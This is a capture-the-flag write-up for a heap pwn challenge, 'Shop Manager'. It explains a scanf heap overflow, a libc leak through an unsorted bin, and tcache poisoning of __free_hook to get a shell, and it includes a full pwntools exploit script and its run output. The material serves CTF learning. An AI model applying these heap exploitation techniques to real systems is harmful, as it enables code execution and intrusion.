## Shop Manager
> Points: 496
> Solves: 6
### Description:
A simple shop simulator
nc 39221
Author: prajnapras19
### Attachments:
## Analysis:
The menu is as follows, and this binary has `Add`, `Delete`, `Edit`, `List`, `Sell` functions.
1. Add item
2. Delete item
3. Edit item
4. List of added items
5. Sell item
6. Exit
Since libc uses libc-2.27.so, I execute this binaries on Ubuntu 18.04 in my local environment.
-rwxr-xr-x 1 mito mito 13168 Sep 1 21:37 chall
-rwxr-xr-x 1 mito mito 179152 Sep 1 21:37 ld-2.27.so
-rwxr-xr-x 1 mito mito 2030928 Sep 1 21:37 libc-2.27.so
The `Item name` input for the `Add` and `Edit` functions uses `__isoc99_scanf("%s", buf)`. Therefore, it has a heap buffer overflow vulnerability because it does not check the size of the input string.
Below is the compile result of `addItem()` by Ghidra.
void addItem(void)
long lVar1;
int iVar2;
void *pvVar3;
iVar2 = idx;
if (idx == N) {
puts("Our shop is full.");
else {
pvVar3 = malloc(0x10);
*(void **)(items + (long)iVar2 * 8) = pvVar3;
lVar1 = *(long *)(items + (long)idx * 8);
pvVar3 = malloc(0x20);
*(void **)(lVar1 + 8) = pvVar3;
printf("Item name: ");
__isoc99_scanf("%s",*(undefined8 *)(*(long *)(items + (long)idx * 8) + 8));
printf("Item price: ");
__isoc99_scanf("%ld",*(undefined8 *)(items + (long)idx * 8));
idx = idx + 1;
puts("Item added successfully.");
## Solution:
First I considered how to leak the libc address.
I added 16 Items to make a big chunk.
Then change the name of the 0th Item using a heap buffer overflow as follows: Resize the 1st chunk from 0x21 to 0x431.
0x604260: 0x0000000000000000 0x0000000000000021
0x604270: 0x0000000000000001 0x0000000000604290
0x604280: 0x0000000000000000 0x0000000000000031
0x604290: 0x6161616161616161 0x6161616161616161
0x6042a0: 0x6161616161616161 0x6161616161616161
0x6042b0: 0x6161616161616161 0x0000000000000431 Change to 0x21 => 0x431
0x6042c0: 0x0000000000000000 0x00000000006042e0
0x6042d0: 0x0000000000000000 0x0000000000000031
0x6042e0: 0x4242424242424242 0x0000000000000000
0x6042f0: 0x0000000000000000 0x0000000000000000
0x604300: 0x0000000000000000 0x0000000000000021
I can create a 0x430 size unsorted bin chunk by deleting the 1st Item.
0x604260: 0x0000000000000000 0x0000000000000021
0x604270: 0x0000000000000001 0x0000000000604290
0x604280: 0x0000000000000000 0x0000000000000031
0x604290: 0x6161616161616161 0x6161616161616161
0x6042a0: 0x6161616161616161 0x6161616161616161
0x6042b0: 0x6161616161616161 0x0000000000000431
0x6042c0: 0x00007ffff7dcdca0 0x00007ffff7dcdca0 The 1st chunk goes into an unsorted bin
0x6042d0: 0x0000000000000000 0x0000000000000000
0x6042e0: 0x4242424242424242 0x0000000000000000
0x6042f0: 0x0000000000000000 0x0000000000000000
0x604300: 0x0000000000000000 0x0000000000000021
Furthermore, if I execute the `Add` function, I can put the address of the unsorted bin chunk in the 2nd chunk, so I can leak the libc address with the `List` function.
'Name: `G`\n'
'Price: 140737351834784\n' => 0x00007ffff7dcdca0
Now that I have chunk overhauled, I can put `__free_hook` into tcache using the `Add`, `Delete` and `Edit` features shown below.
# tcache poisoning
Add("c", 3)
Edit(14, "d", free_hook)
The following is the state of tcache after executing the above function.
pwndbg> bins
0x20 [100]: 0x604310 —▸ 0x7ffff7dcf8e8 (__free_hook) ◂— 0x0
Finally, I write `/bin/sh` to Price of the 14th chunk, I write the address of the `system` function to `__free_hook`, and delete the 14th chunk to start the shell.
# Write system address in __free_hook
Add("e", u64("/bin/sh\x00")) # 14
Add("f", system_addr)
# Start shell
I didn't use the `Sell` function.
## Exploit code:
from pwn import *
#context(os='linux', arch='amd64')
#context.log_level = 'debug'
BINARY = './chall'
if len(sys.argv) > 1 and sys.argv[1] == 'r':
HOST = ""
PORT = 39221
s = remote(HOST, PORT)
libc = ELF("./libc-2.27.so")
s = process(BINARY)
libc = elf.libc
def Add(data, price):
s.sendlineafter("> ", "1")
s.sendlineafter("name: ", data)
s.sendlineafter("price: ", str(price))
def Delete(idx):
s.sendlineafter("> ", "2")
s.sendlineafter("): ", str(idx))
def Edit(idx, data, price):
s.sendlineafter("> ", "3")
s.sendlineafter("): ", str(idx))
s.sendlineafter("name: ", data)
s.sendlineafter("price: ", str(price))
def List():
s.sendlineafter("> ", "4")
def Sell(idx, item):
s.sendlineafter("> ", "5")
s.sendlineafter("): ", str(idx))
s.sendlineafter("item?\n", item)
def Exit():
s.sendlineafter("> ", "6")
for i in range(16):
Add(chr(0x41+i)*8, 1)
# libc leak
Edit(0, "a"*0x28+p64(0x431), 1)
Add("b", 2)
for i in range(2):
s.recvuntil("Price: ")
libc_leak = int(s.recvuntil("\n"))
libc_base = libc_leak - libc.sym.__malloc_hook - 0x70
free_hook = libc_base + libc.sym.__free_hook
system_addr = libc_base + libc.sym.system
print "libc_leak =", hex(libc_leak)
print "libc_base =", hex(libc_base)
# tcache poisoning
Add("c", 3)
Edit(14, "d", free_hook)
# Write system address in __free_hook
Add("e", u64("/bin/sh\x00")) # 14
Add("f", system_addr)
# Start shell
## Results:
mito@ubuntu:~/CTF/COMPFEST_CTF_2021/Pwn_Shop_Manager/shop-manager-master-public/public$ python solve.py r
[*] '/home/mito/CTF/COMPFEST_CTF_2021/Pwn_Shop_Manager/shop-manager-master-public/public/chall'
Arch: amd64-64-little
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Opening connection to on port 39221: Done
[*] '/home/mito/CTF/COMPFEST_CTF_2021/Pwn_Shop_Manager/shop-manager-master-public/public/libc-2.27.so'
Arch: amd64-64-little
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
libc_leak = 0x7ff49f953ca0
libc_base = 0x7ff49f568000
[*] Switching to interactive mode
$ id
/bin/sh: 1: id: not found
$ ls -l
total 2208
drwxr-xr-x 2 0 0 4096 Sep 12 04:33 bin
-r-xr-xr-x 1 0 0 17264 Sep 12 04:33 chall
drwxr-xr-x 2 0 0 4096 Sep 12 04:33 dev
-r--r--r-- 1 0 0 56 Sep 12 04:33 flag.txt
-rwxr-xr-x 1 0 0 179152 Sep 12 04:33 ld-2.27.so
drwxr-xr-x 21 0 0 4096 Sep 12 04:33 lib
drwxr-xr-x 3 0 0 4096 Sep 12 04:33 lib32
drwxr-xr-x 2 0 0 4096 Sep 12 04:33 lib64
-rwxr-xr-x 1 0 0 2030928 Sep 12 04:33 libc-2.27.so
-rwxr-xr-x 1 0 0 339 Sep 12 04:33 run.sh
$ cat flag.txt
I also wrote an Exploit code (`solve_stackpivot.py`) that uses the sell function after the competition.